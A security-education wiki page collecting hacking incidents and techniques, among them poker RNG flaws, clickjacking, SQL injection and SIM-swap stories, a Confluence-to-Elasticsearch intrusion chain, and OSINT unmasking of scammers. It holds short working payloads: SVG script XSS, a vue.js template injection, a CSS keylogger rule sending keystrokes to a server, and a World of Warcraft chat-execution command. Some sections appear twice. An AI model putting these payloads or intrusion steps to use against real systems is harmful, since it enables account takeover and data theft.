Cyber Attacks

From Teach The Net
Jump to: navigation, search

Contents

Standard Hacks

Information Leakage

Mobile App Rackspace credentials embedded within app

Thursday, the hacker said he started wiping some cloud servers that belong to Retina-X Studios, a Florida-based company that sells spyware products targeted at parents and employers, but that are also used by people to spy on their partners without their consent.

Retina-X was one of two companies that were breached last year in a series of hacks that exposed the fact that many otherwise ordinary people surreptitiously install spyware on their partners’ and children’s phones in order to spy on them. This software has been called “stalkerware” by some. 

...The private data was stored in containers provided by cloud provider Rackspace. The hacker found the key and credentials to those containers inside the Android app of PhoneSheriff, one of Retina-X’s spyware products. The API key and the credentials were stored in plaintext, meaning the hacker could take them and gain access to the server.

This time, the hacker said the API key was obfuscated, but it was still relatively easy for him to obtain it and break in again. Because he feared another hacker getting in and then posting the private photos online, the hacker decided to wipe the containers again.

- Article

Client-side Validation

BitGrail javascript validation for withdrawal

BitGrail (a cryptocurrency exchange) was hacked for $170 million, allegedly because "the checks for whether you had a sufficient balance to withdraw were only implemented as client-side JavaScript".
- Tweet

RNG

Texas Hold 'Em online - bad shuffler

Texas Hold 'Em, card shuffling randomness. We found that the algorithm used by ASF Software, Inc., the company that produces the software used by most of the online poker games, suffered from many flaws.
 
In a real deck of cards, there are 52! (approximately 2^226) possible unique shuffles. When a computer shuffles a virtual deck of cards, it selects one of these possible combinations. There are many algorithms that can be used to shuffle a deck of cards, some of which are better than others (and some of which are just plain wrong).

The shuffling algorithm used in the ASF software always starts with an ordered deck of cards, and then generates a sequence of random numbers used to re-order the deck. Recall that in a real deck of cards, there are 52! (approximately 2^226) possible unique shuffles. Also recall that the seed for a 32-bit random number generator must be a 32-bit number, meaning that there are just over 4 billion possible seeds. Since the deck is reinitialized and the generator re-seeded before each shuffle, only 4 billion possible shuffles can result from this algorithm. Four billion possible shuffles is alarmingly less than 52!.

To make matters worse, the algorithm of Figure 1 chooses the seed for the random number generator using the Pascal function Randomize(). This particular Randomize() function chooses a seed based on the number of milliseconds since midnight. There are a mere 86,400,000 milliseconds in a day. Since this number was being used as the seed for the random number generator, the number of possible decks now reduces to 86,400,000. Eight-six million is alarmingly less than four billion. But that's not all. It gets worse.

The system clock seed gave us an idea that reduced the number of possible shuffles even further. By synchronizing our program with the system clock on the server generating the pseudo-random number, we are able to reduce the number of possible combinations down to a number on the order of 200,000 possibilities. After that move, the system is ours, since searching through this tiny set of shuffles is trivial and can be done on a PC in real time.

The RST exploit itself requires five cards from the deck to be known. Based on the five known cards, our program searches through the few hundred thousand possible shuffles and deduces which one is a perfect match. In the case of Texas Hold'em poker, this means our program takes as input the two cards that the cheating player is dealt, plus the first three community cards that are dealt face up (the flop). These five cards are known after the first of four rounds of betting and are enough for us to determine (in real time, during play) the exact shuffle. 

- Article
- Another article on it

Bridge hand generator RNG

ACBL and USBF hand generators are demonstrably insecure
- Related Issue/Article

CSRF

Challenges

* Hackme
* Be sure to do both GET (image) and POST (form) examples. 
* To defeat origin header, use image/get hosted on domain (e.g. profile image)
* To defeat CSRF token, have a javascript file that sets the url to a variable name exposing the CSRF token if you include that javascript file. link (also have another where the CSRF token just has to be unused before, or unique, or doesn't validate at all)

Clickjacking

Informative Blog

CSS has a property called position that allows an element to sit on top of another element. In addition, the property pointer-events allows click events to passthrough an element, so that the click is actually registered on the element underneath. When two combined, I can stack a fake button on top of the actual button and trick you to click it...

If you have logged in Facebook, then what you just did was to like my blog post (which I appreciate) without realizing it. This time, opacity is used instead of pointer-events. opacity is a CSS property that controls the opacity of an element. 

People have been exploiting Clickjacking with web widgets. Many social media sites were actually vulnerable to this. For example, you could use Clickjacking to gain followers with Twitter follow button, and a more recent issue on LinkedIn AutoFill button that leaks visitor's infomation to third-party websites. Sites have started fixing it by requiring addition user interactions, for example, open a new window for users to confirm an action. In fact, Likejacking probably no longer works nowadays. If you try to click the above Facebook like button, it may turn into a "Confirm" button which requires you to click again after you click it. Essentially, they now use an algorithm to determine if an embedding site is trustworthy and hence the number of additional user interactions. Ultimately this is a trade-off between usability and security.

However, X-Frame-Options: SAMEORIGIN has a serious flaw... At the time of writing, only Chrome and Firefox have fixed the issue by making the check against all frame ancestors, which is compliant to CSP's frame-ancestors 'self'.

Actually don't even click anything. Malicious websites can simply track your cursor's position and change the invisible button/iframe's position accordingly. So even if you make a click by mistake you will be forced to click on something else.

There's no reliable way to prevent Clickjacking...

- Article

SQL Truncation

Challenges

* CTF Sql Truncation Challenge

File Upload

Challenges

* HackMe File Upload

Microsoft Word Document upload to stored XSS

Microsoft Word Document upload to stored XSS
* File upload on site, only takes in .docx files...
* Extension validation is client-side. Can upload file with any extension.
* File download is triggered via a url, without `Content-Disposition: attachment`, expectation is download is just triggered based off docx extension. So if we can upload a file the browser can render, it will load instead of being downloaded.
* On a test docx file, file downloaded does not exactly match file uploaded - implies some processing is done on the file when uploaded.
* Hack: Take a valid .docx file, upload and then download. Find areas of strings that were not changed by server-side processing, insert html in those areas. Change file extension to .html, and then upload. 'Download' link should now host html page running your javascript.

SQL Injection

Challenges

* SQL Injection Auth Code
* SQL Injection Login
* multiple

SDK hidden behind access code, but with a deadline

  • idynamo sdk download access code, sent in US mail 1-2 week delivery. But there was a deadline to create the product... and already had the device without the SDK.

Affiliate backend pagination leads to downfall

  • Paul Le Roux hunted by the US Government. They caught him because of a simple SQL Injection flaw in the pagination of an affiliate backend on RX Limited.

A lot of shady services online allow affiliates or resellers to take a cut and expand their reach.

In an invite-only affiliate control panel of this site, there was a SQL injection flag in their pagination. Using this sql injection, dumped database, saw all affiliate payouts including biggest payment receiving affiliates (who tended to be the big names / biggest scammers) along with how they were paid.

Original comment on Hackernews thread featuring this article:

Guys I can tell you how he got caught. At around 2011 I hacked RXLimited backend through a security flaw on christmas eve.

They had one simple SQL Injection flaw in pagination in their affiliate backend. Through this I was able to extract the VPN config of the webserver including the keys, which I then used to log in to their VPN with my computer.

After snooping around a bit, I found that their backup server had Apache directory listing enabled, and I as able to download several hundred megabytes of database backups. I got kicked out of the VPN several times but I was able to continue the download to completion.

From these database backups I extracted the payment information of all affiliates, compiled a list sorted by sum(payouts) desc including SWIFT payment infos and a detailed list of payments to affiliates with date and amount.

This list was submitted through my local law enforcement in the EU to their counterparts in the US. I never heard back from them, but using this info you could easily find out where the money was moved around with all shady figures attached.

You can believe me or not, but it was a nice hobby to fuck the bad guys over. The money moving around in this business still astonishes me. And all through a simple SQLi in pagination in the most remote view of their affiliate backend...
- Link to original Hackernews comment, since censored Archived snapshot of comment

Metasploit/CVE Database

Wordpress Challenges

* Sample Repo
* toolkit

Security Company Challenge

Background

Computer security company sells security products. In an effort to get publicity, puts up a secure server, offers a macbook for anyone who hacks into it.

Review products company sells

  • Note that their documentation is on a Confluence wiki. If they use Confluence wiki so heavily for user-facing docs, likely they use them internally too.

Google confluence wiki

  • Find that it's a self-hosted solution, complex and thus hard to update.
  • Scan for their version in CVE database. Find a hit! CVE-2015-8399 allows unauthenticated users to browse and read files from disk that are accessible to the Confluence user, and docs.inversoft.com was vulnerable to it
  • Review files capable of reading through above exploit, find nothing of significance (no configuration file).

Nmap scan on domain where confluence wiki was hosted

  • Find postgres database, mysql database, elasticsearch, ssh, several http services. Get versions of each.
  • Find elasticsearch is old, and thus vulnerable to CVE-2015-1427 which allows remote code execution.

Now have SSH access as non-root user

  • Could read anything elasticsearch could see, Confluence was also running under this same user!
  • Scanning around, found database credentials confluence used to talk to postgres.
  • Used credentials above to get a dump of the Confluence database for off-line perusing.

scanning the database

  • It was indeed used for internal documentation
  • Contained various passwords and keys, including a linode username/password (the target was on linode). Turns out it's a valid, but wrong, linode account.

thinking through next steps

  • use our access to intercept a password reset email for the real linode account?
  • use our access to make a convincing phish email
  • Rescanning our existing gathered info... find in the elasticsearch account's root directory a variety of shared dev files, including api keys to the real linode instance! Connect in, dump db.

Overall

  • utility servers used by devs are the key

Article

MySQL: sql injection escalate to code execution CVE-2016-6662

- Article

XSS

Challenges

Vue.js Server-side XSS
* XSS attack is filtered out, but can inject a vue.js template e.g. `Template:Constructor.constructor("alert('xss')")()`
* This exploit is possible because the app is mixing serverside rendering and clientside rendering.
Cookie stealing challenge
And one last XSS attack to evade, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox):
Cheatsheet
html injection via encoding
https://hackerone.com/reports/104543
markdown processing injection (instead of bbcode)
https://hackerone.com/reports/112935

XSS with SVG?

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd%22%3E 

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('You have been hacked!');
</script>
</svg>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd%22%3E 

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('XSS');
</script>
</svg>
- Post 1
- Post 2

Spoofing

Challenges

- Hackme Social Engineering

Spoof 2-factor auth text message

The reader’s daughter had received a text message claiming to be from Google, warning that her Gmail account had been locked because someone in India had tried to access her account. The young woman was advised to expect a 6-digit verification code to be sent to her and to reply to the scammer’s message with that code.

Cobb’s daughter received the scam text message because she’d enabled 2-factor authentication on her Gmail account, selecting the option to have Google request that she enter a 6-digit code texted to her cell phone each time it detects a login from an unknown computer or location (in practice, the code is to be entered on the Gmail site, not sent in any kind of texted or emailed reply).

In this case, the thieves already had her password — most likely because she re-used it on some other site that got hacked. Cobb says he and his daughter believe her mobile number and password may have been exposed as part of the 2012 breach at LinkedIn.

In any case, the crooks were priming her to expect a code and to repeat it back to them because that code was the only thing standing in the way of their seizing control over her account. And they could control when Google would send the code to her phone because Google would do this as soon as they tried to log in using her username and password. Indeed, the timing aspect of this attack helps make it more believable to the target.

- Article
T-Mobile's website had a security flaw with a url endpoint which returned a user's email address, accounts and a phone's IMSI network code. This url was passed the user's phone number in the URL, but a user could edit that phone number to any other T-Mobile number and obtain the information on it. This information is all that's for a hacker to call T-Mobile and transfer control of the phone number to a different sim under their control. With control of the phone number, they can now receive 2-factor auth text messages. 

In fact, this is exactly what happened to Techcrunch writer John Biggs on August 22nd. After impersonating him and obtaining a replacement for his T-Mobile SIM, a hacker was able to quickly change his Gmail, Facebook, and other passwords, even though they were protected by two-factor SMS authentication.

- Article
- Video demonstrating the exploit
- Techcrunch writer's side of the story
In these cases, the fraudsters can call a customer service specialist at a mobile provider and pose as the target, providing the mark’s static identifiers like name, date of birth, social security number and other information. Often this is enough to have a target’s calls temporarily forwarded to another number, or ported to a different provider’s network.
- Krebs Article

More stories of porting/stealing cell phone numbers to defeat 2 factor auth:

Typo-squatting a domain for SSH password

Question: When you accidentally attempt to connect to the wrong server with password credentials is it possible for the administrator to read and log the password you used?

Answer: Yes

- Stackoverflow Question

GMAIL sent folder spoof

Spoofing FROM address to get into GMAIL Sent folder
* A normal spoofed 'from' email, sent FROM a gmail user TO another gmail user, will actually appear in the SENT folder of the real FROM user's account.

Unicode characters in URL spoof

Spoofing URL with look-alike unicode characters on Firefox / TOR Browser
* Firefox (and Tor Browser) display unicode characters in the URL indistinguishably from ascii characters. Chrome and other browsers convert them to punycode.

CEO whaling/spear phishing

Whaling is a well-oiled social engineering scam that sees criminals dupe financial controllers at large lucrative organisations. Whalers' main method is to send emails that appear to originate from chief executive officers, bearing instructions to wire cash into nominated bank accounts.

It works. The FBI estimates some $2.2bn (£1.7bn, A$2.9bn) in losses have arisen from nearly 14,000 whaling cases in the seven months to May this year. Some $800m (£601m, A$1bn) in losses occurred in the 10 months to August 2015.
Harpooned companies include Mattel, which shipped and by dumb luck recouped $3m its executive sent to a hacker's Chinese bank account; Ubiquiti, which lost $46.7m in June last year; and Belgian bank Crelan, which lost $78m in January.

They join Accenture, Chanel, Hugo Boss, HSBC, and countless smaller victims.

- Article
Brisbane council loses $500k to scammers

- Article
Barbie-brained Mattel exec phell for phishing, sent $3m to China

- Article
Ubiquiti stung US$46.7 million in e-mail spoofing fraud

- Article
Vigilante hacks back at CEO wire transfer scammers, sending a poisoned PDF pretending to be a transaction confirmation. When opened, "We were able to get the Windows 10 usernames and hashes which are tied by default to Outlook."

- Article

DOS

Block Skype Accounts trivially

Block anyone's Skype account
* Have about 20 different accounts search for target user X and click Report User
* Done, victim is now blocked from Skype and locked out.

Shutdown iPad Kiosks with sunlight

This reminds me of a “bug” I found when working for a company that sells package lockers to apartment buildings. We used iPads for the user interface and had monitoring in place to alert us if an iPad went offline.
At only one location with two iPads one would go offline almost every day (but not every day) between 12pm and 1pm, for 10-20 minutes. Never the same time of day, and never the same length of time. It was always the same iPad, the other one on that network stayed online the entire time.
We replaced the iPad and the problem persisted. Finally I got fed up, put my phone on silent, ignored everything, and watched the Dropcam feed for the 2 hours near the usual time. Slowly I saw the sun light up the lockers, eventually shining on the iPad. Ten minutes later, after sitting in direct sunlight, it went offline. As the sun moved, the iPad went back in to shadow and came online on its own.
It was overheating and shutting itself off until it cooled down. The time changed because day lengths change, and the days it didn’t go offline were cloudy.
- Hackernews thread

DNS Rebinding

Tools

* Open source tool: Jaqen
* Hosted tool used via subdomains: rbndr
* Defcon Talk: Achieving reliable DNS rebinding 2017

Electrum, a bitcoin client

* Has a JSON-RPC api enabled by default, and CORS is enabled. This made it trivial for any website to connect to your wallet's api and dump the seeds. In this Github Issue, developers decide to disable CORS. This still makes it vulnerable to DNS rebinding attacks.

Metasploit/CVE Database

Wordpress Challenges

* Sample Repo
* toolkit

Security Company Challenge

Background

Computer security company sells security products. In an effort to get publicity, puts up a secure server, offers a macbook for anyone who hacks into it.

Review products company sells

  • Note that their documentation is on a Confluence wiki. If they use Confluence wiki so heavily for user-facing docs, likely they use them internally too.

Google confluence wiki

  • Find that it's a self-hosted solution, complex and thus hard to update.
  • Scan for their version in CVE database. Find a hit! CVE-2015-8399 allows unauthenticated users to browse and read files from disk that are accessible to the Confluence user, and docs.inversoft.com was vulnerable to it
  • Review files capable of reading through above exploit, find nothing of significance (no configuration file).

Nmap scan on domain where confluence wiki was hosted

  • Find postgres database, mysql database, elasticsearch, ssh, several http services. Get versions of each.
  • Find elasticsearch is old, and thus vulnerable to CVE-2015-1427 which allows remote code execution.

Now have SSH access as non-root user

  • Could read anything elasticsearch could see, Confluence was also running under this same user!
  • Scanning around, found database credentials confluence used to talk to postgres.
  • Used credentials above to get a dump of the Confluence database for off-line perusing.

scanning the database

  • It was indeed used for internal documentation
  • Contained various passwords and keys, including a linode username/password (the target was on linode). Turns out it's a valid, but wrong, linode account.

thinking through next steps

  • use our access to intercept a password reset email for the real linode account?
  • use our access to make a convincing phish email
  • Rescanning our existing gathered info... find in the elasticsearch account's root directory a variety of shared dev files, including api keys to the real linode instance! Connect in, dump db.

Overall

  • utility servers used by devs are the key

Article

MySQL: sql injection escalate to code execution CVE-2016-6662

- Article

Novel Hacks

Fingerprinting Documents to track leakers / inside threats

Unicode homoglyph substitution [Conference Paper on Unicode Homoglyph Substitution] [Web App for Unicode Homoglyph Substitution]

Zero-width characters [Blog Post]

Article on all methods [Good general article]

Intentional mispelling (used in congress) [Blog Post]

Stealth Cell Tower

Stealth Cell Tower is an antagonistic GSM base station in the form of an innocuous office printer. It brings the covert design practice of disguising cellular infrastructure as other things - like trees and lamp-posts - indoors, while mimicking technology used by police and intelligence agencies to surveil mobile phone users.

Masquerading as a regular cellular service provider, Stealth Cell Tower surreptitiously catches phones and sends them SMSs written to appear they are from someone that knows the recipient. It does this without needing to know any phone numbers.

With each response to these messages, a transcript is printed revealing the captured message sent, alongside the victim’s unique IMSI number and other identifying information. Every now and again the printer also randomly calls phones in the environment and on answering, Stevie Wonder’s 1984 classic hit I Just Called To Say I Love You is heard.

- Article

Self-Propagating Smart Light Bulb Worm

Abstract: Within the next few years, billions of IoT devices will densely populate our cities. In this paper we describe a new type of threat in which adjacent IoT devices will infect each other with a worm that will spread explosively over large areas in a kind of nuclear chain reaction, provided that the density of compatible IoT devices exceeds a certain critical mass. In particular, we developed and verified such an infection using the popular Philips Hue smart lamps as a platform. The worm spreads by jumping directly from one lamp to its neighbors, using only their built-in ZigBee wireless connectivity and their physical proximity. The attack can start by plugging in a single infected bulb anywhere in the city, and then catastrophically spread everywhere within minutes, enabling the attacker to turn all the city lights on or off, permanently brick them, or exploit them in a massive DDOS attack. To demonstrate the risks involved, we use results from percolation theory to estimate the critical mass of installed devices for a typical city such as Paris whose area is about 105 square kilometers: The chain reaction will fizzle if there are fewer than about 15,000 randomly located smart lights in the whole city, but will spread everywhere when the number exceeds this critical mass (which had almost certainly been surpassed already).

To make such an attack possible, we had to find a way to remotely yank already installed lamps from their current networks, and to perform over-the-air firmware updates. We overcame the first problem by discovering and exploiting a major bug in the implementation of the Touchlink part of the ZigBee Light Link protocol, which is supposed to stop such attempts with a proximity test. To solve the second problem, we developed a new version of a side channel attack to extract the global AES-CCM key that Philips uses to encrypt and authenticate new firmware. We used only readily available equipment costing a few hundred dollars, and managed to find this key without seeing any actual updates. This demonstrates once again how difficult it is to get security right even for a large company that uses standard cryptographic techniques to protect a major product.

- Schneier article, Article

Inaudible Sound Attacks

- Cuban Sonic Weapon Attack - Reverse Engineered

- Alexa/Siri attacks: Dolphin Attack Article / Dolphin Attack Paper

- Embedding the above attack into music

Tracking Pixel Service to decrypt emails

  • Client sends you an encrypted email, asks you to append tracking pixel. You do so and then forward it along.
  • Your tracking pixel actually sends you the decrypted version of the email from the client's machine.
  • Some mail clients concatenate all parts of a multipart message together, even joining partial HTML elements, allowing the decrypted plaintext of an OpenPGP or S/MIME encrypted part to be exfiltrated via an image tag.

Hackernews thread Article

Project a voice with a laser

This specific project, called Non-Lethal Laser Induced Plasma Effects (NL LIPE), aims to have a perfected a beam that can produce audible instructions and commands to an individual or a small group of people within three years and maybe have a practical prototype system ready in five years.
- Article

Casino Hacked Through Fish Tank Thermometer

A casino was hacked through its Internet-connected thermometer in an aquarium in its lobby. Hackers exploited a vulnerability in the thermostat to get a foothold in the network. Once there, they managed to access the high-roller database of gamblers and then pulled it back across the network, out the thermostat, and up to the cloud.
- Article
A North American casino recently installed a high-tech fish tank as a new attraction, with advanced sensors that automatically regulate temperature, salinity, and feeding schedules. To ensure these communications remained separate from the commercial network, the casino configured the tank to use an individual VPN to isolate the tank’s data. However, as soon as Darktrace was installed, it identified anomalous data transfers from the fish tank to a rare external destination. 
- Report

World of Warcraft: RemoveExtraSpaces

World of Warcraft supports add-ons to their interface in the Lua script language. Because of this, they have a robust api for these add-ons to use.

For this attack, the attacker must convince the player to enter one single command into their chat window:

/run RemoveExtraSpaces=RunScript

In this command, '/run' says to interpret what follows as a Lua script, 'RemoveExtraSpaces' is a built-in function that removes extra spaces from text, and 'RunScript' in a built-in function that executes text as Lua script (similar to eval in javascript).

The function 'RemoveExtraSpaces' is executed on every chat message a player receives, so in effect the above command causes every chat message the player receives to be executed as though it's Lua script.

Now the attacker can simply whisper the victim player to cause the user's interface to do anything he wishes, or to extract information about the player. He can (for example), extract the current player's location in game from his UI, approach the player in game, and then open a trade with the player and force the player's UI to hit the accept button.

[Article]

CSS Keylogger

Concept (repeat for every ascii character):

input[type="password"][value$="D"] { background-image: url("http://localhost:3000/D"); }
  • Works for password inputs that update 'value' attribute with the typed in value, a common pattern in React.
  • For password managers like LastPass, you can get the first character with [value^=a], the last value [value$=a], and anywhere in the string [value*=a]. Could target like first two and last two and any in middle with around 13000 combinations.

Open Source Lib

Jumping Airgaps

Guri and his fellow Ben-Gurion researchers have shown, for instance, that it's possible to trick a fully offline computer into leaking data to another nearby device via the noise its internal fan generates, by changing air temperatures in patterns that the receiving computer can detect with thermal sensors, or even by blinking out a stream of information from a computer hard drive LED to the camera on a quadcopter drone hovering outside a nearby window. In new research published today, the Ben-Gurion team has even shown that they can pull data off a computer protected by not only an air gap, but also a Faraday cage designed to block all radio signals.
- Quoted from Schneier's blog, which quotes from here

Page with all research results

Overall concept:

  • Drop a USB drive with malware in a parking lot. Employee picks it up, and sticks it in an air gapped machine to see what's on it. This infects that machine.
  • Now we have a machine not connected to the internet that is infected... use one of the proposed concepts above to exfiltrate the data.

Payoff

Cryptocurrency private keys for hot wallets

Coincheck $500 million hack

According to the exchange’s representatives, the hackers have managed to steal the private key for the hot wallet where NEM coins were stored, enabling them to drain the funds. 
- Article

Gatecoin $2 million hack

Most clients’ asset funds are stored in multi-signature, cold wallets. However, the attacker managed to alter the system so that BTC and ETH deposit transfers bypassed the multi-signature cold storage and entered the hot wallet during the breach. The loss of ETH funds exceeded the 5% limit Gatecoin placed on its hot wallets.
- Article

Hacking to game the stock market

St Jude's

St Jude's Medical Inc.'s pacemakers and defibrillators had a vulnerability that was discovered by researchers working for a legit company. They email an investment firm with an offer to make money.

The researchers would provide information proving the medical devices could be hacked in a way that was life-threatening, and the investor would take a short position against St Jude. The hacker's fee for the information would be 10% of the profits as the shares fall. If the shares go up, the hackers will pay 20% of the lost money.

Researchers want to impose significant monetary penalties on companies it believes are negligent when it comes to protecting consumers. (Rather than typical bug bounty). Don't believe hackers will exploit it, as it took their team months to find the exploits and they will withhold key details from the public. 
- Article
Medical device maker St Jude has filed suit against a security startup that shorted its stock and publicized alleged flaws in its products for profit.

Pacemaker supplier St Jude has sued both MedSec and investment research biz Muddy Waters in Minnesota, America, as well as three other individuals it says falsely reported serious vulnerabilities in its pacemakers and defibrillators.

The allegations [PDF] include false advertising, false statements, conspiracy, and market manipulation.

- Article

AMD

Last week, the Israeli security company CTS-Labs published a series of exploits against AMD chips. The publication came with the flashy website, detailed whitepaper, cool vulnerability names -- RYZENFALL, MASTERKEY, FALLOUT, and CHIMERA -- and logos we've come to expect from these sorts of things. What's new is that the company only gave AMD a day's notice, which breaks with every norm about responsible disclosure. 

But CTS's website touting AMD's flaws also contained a disclaimer that threw some shadows on the company's motives: "Although we have a good faith belief in our analysis and believe it to be objective and unbiased, you are advised that we may have, either directly or indirectly, an economic interest in the performance of the securities of the companies whose products are the subject of our reports," reads one line. WIRED asked in a follow-up email to CTS whether the company holds any financial positions designed to profit from the release of its AMD research specifically. CTS didn't respond.

- Scheier Blog Post
- Article

Equifax

Before Equifax revealed its massive data breach last year, four of its executives sold their shares. Four days after news of the breach hit the press, the stock had plunged 18.4%. (One of those executives, Jun Ying, was charged on Wednesday for insider trading.)
- Article

Revenge/Vigilantes

Ransomware a Tech Support Scammer

Tech support scammers mess with hacker's mother, so he retaliated with ransomware. He faked falling for the scam, and then sent the scammer a fake photo of credit card in a zip file, which when unzipped really triggered ransomware. 
- Article

CEO wire transfer scammers open poisoned PDF invoices

Hacker takes down CEO wire transfer scammers, sends their Win 10 creds to the cops. 'Whaling' attackers fall for poison PDF 'invoices'.
- Article

Hacker wipes spyware servers multiple times

Thursday, the hacker said he started wiping some cloud servers that belong to Retina-X Studios, a Florida-based company that sells spyware products targeted at parents and employers, but that are also used by people to spy on their partners without their consent.

Retina-X was one of two companies that were breached last year in a series of hacks that exposed the fact that many otherwise ordinary people surreptitiously install spyware on their partners’ and children’s phones in order to spy on them. This software has been called “stalkerware” by some. 

...The private data was stored in containers provided by cloud provider Rackspace. The hacker found the key and credentials to those containers inside the Android app of PhoneSheriff, one of Retina-X’s spyware products. The API key and the credentials were stored in plaintext, meaning the hacker could take them and gain access to the server.

This time, the hacker said the API key was obfuscated, but it was still relatively easy for him to obtain it and break in again. Because he feared another hacker getting in and then posting the private photos online, the hacker decided to wipe the containers again.

- Article

Ransomware

Spread Popcorn Time Ransomware, get chance of free Decryption Key

Yesterday a new in-development ransomware was discovered by MalwareHunterTeam called Popcorn Time that intends to give victim's a very unusual, and criminal, way of getting a free decryption key for their files.  With Popcorn Time, not only can a victim pay a ransom to get their files back, but they can also try to infect two other people and have them pay the ransom in order to get a free key.
- Article

OpSec Violations

Marcus Hutchins [Sept 2017]

Flipertyjopkins uploads video to Youtube 8 years ago instructing viewers how to use Hotmail cracker v1.3. Investigative Journalist Brian Krebs notes that at 2:48 mark in video, an MSN Chat Window shows up that clearly shows the user is logged in as "[email protected]", thus linking Flipertyjopkins to Marcus Hutchins.

[Article]

eBay Scammer [Sept 2016]

Person had $500 Apple gift card, wanted to sell for bitcoin due to lack of chargebacks.

Several potential buyers, all wanted it for 50% or less of card's worth. Found one willing to pay 75% on reddit darkmarket.

Seller sends card numbers for buyer to verify balance + details on how to verify identity (news article about winner of competition, clicking blog post link in article takes to winner's blog, click about me page lists social usernames one of which is reddit account communication is taking place on).

Buyer says seller could have just bought that reddit account, insists on not going first, says has eBay account with high positive feedback and will prove it. Seller says you could have bought eBay account, buyer replies can't due to lockout on geo/ip changes. Buyer sends seller message to prove his owning of account with high rep.

Seller sends pins for cards + bitcoin address for payment + pictures of card hosted on his site + tracking number for mailed cards.

Buyer deletes his reddit account to stop communication. Seller messages him on eBay, buyer on eBay claims his account was hacked and it wasn't him.

Seller decides to track buyer/scammer down. From the scammer's eBay account, the seller had a username + city location. From the scammer's reddit account, the seller had a username.

A google search for the scammer's reddit and eBay usernames uncovered a Steam account which used both names, confirming it was not a hacked eBay account but the same person who went by two nicknames. The google search also uncovered a profile on a looking-for-job website which contained the scammer's first name, first letter of last name, and city location (which matched the one on eBay).

Seller had sent buyer an image of the cards. Scammer had opened it, which gave the seller the scammer's IP address and city (which again matched the one on eBay).

Seller now did a Facebook search for scammer's ebay username. In the text post of a random gamer, seller sees the message "Good games last night on LoL <scammer_ebay_username>". Unfortunately link to profile wasn't link, only text due to privacy settings of linked user.

Seller looked at this random gamer's profile, scrolled through 4 years of posts, and found a screenshot that random gamer posted that had the scoreboard from LoL (League of Legends) in the foreground AND facebook chat open in the background, with the scammer's full name visible (matching the first name plus first letter of last name seller got from the job website). So from this, seller discovered scammer's full first and last name.

Seller now did a Facebook search of scammer's last name and city, and found the scammer's mother. He sent the scammer's mother a Facebook message.

[Article]

vDos [Sept 2016]

Investigator was analyzing random ddos-for-hire site PoodleStresser. He found a vulnerability, which allowed downloading config data on the site. This data showed PoodleStresser connects to api of ddos-for-hire site vDOS to power their attacks (so PoodleStresser is just a reseller of vDOS).

vDos is a much larger site of the same ilk, hidden behind cloudflare (so the site's true IP is not known). Using the downloaded config data from PoodleStresser gave the investigator api access to vDos. The investigator found a serious vulnerability in the api of vDos that allowed dumping vDos' database and config files, as well as obtaining the true IP address of vDos (which pointed to four rented servers in Bulgaria at Verdina.net).

From the vDos dumped database, all tech support tickets were extracted. From these support tickets, it was discovered that all attacks vDos clients attempted to make against Israel failed (suggesting owners were in Israel trying to avoid attention of Israeli authorities). Additionally, the vDos owners' online nicknames were found in the support tickets as P1st0 and AppleJ4ck.

From the vDos extracted config files, it was discovered that the site was configured to blast text messages to 6 phone numbers (two of which are Israeli) whenever support ticket of high level created via SMS service online called Nexmo.com. Of the two Israeli phone numbers, one was tracked via Whitepages online to an Israeli named Yarden Bidani, while the other was connected via WhoIs records to the domain v-email.org under the name Itay Huri. It was also discovered that the site was configured to send support emails to [email protected], [email protected] and [email protected]

A reverse IP lookup found several other sites running on the same IP as vDos. A whoIS lookup on these domains found one of them registered to a phone number matching one of the phone numbers vDos' config files blasted out text messages to.

A google search for the owner's aliases (that were discovered in the tech support tickets) found listings they made on places like hackforums.net, peddling warez and services.

[Article]

KickAss Torrents [July 2016]

The feds track the owner of KAT through a variety of methods, though mostly through accessing bank and server records.

Possible angle: Client had a website example.com, which Feds saw pointed to IP Address 5.5.5.5. A reverse DNS lookup on 5.5.5.5 showed several other domains hosted at the same IP address (many of which just proxied the main site). One of those other domains was old, and the whois record for it was not privacy protected and thus leaked the true owner's name, address, phone, and email. The email from this domain was used for an Apple account that purchased something on iTunes using a specific IP address (that wasn't hidden behind a proxy). Same IP address was person managing Facebook page for KAT. Coinbase account to collect bitcoin donations also tied to same email address, and bitcoin address behind Coinbase account was on KAT website for donations.

[Article 1, Article 2, Article 3]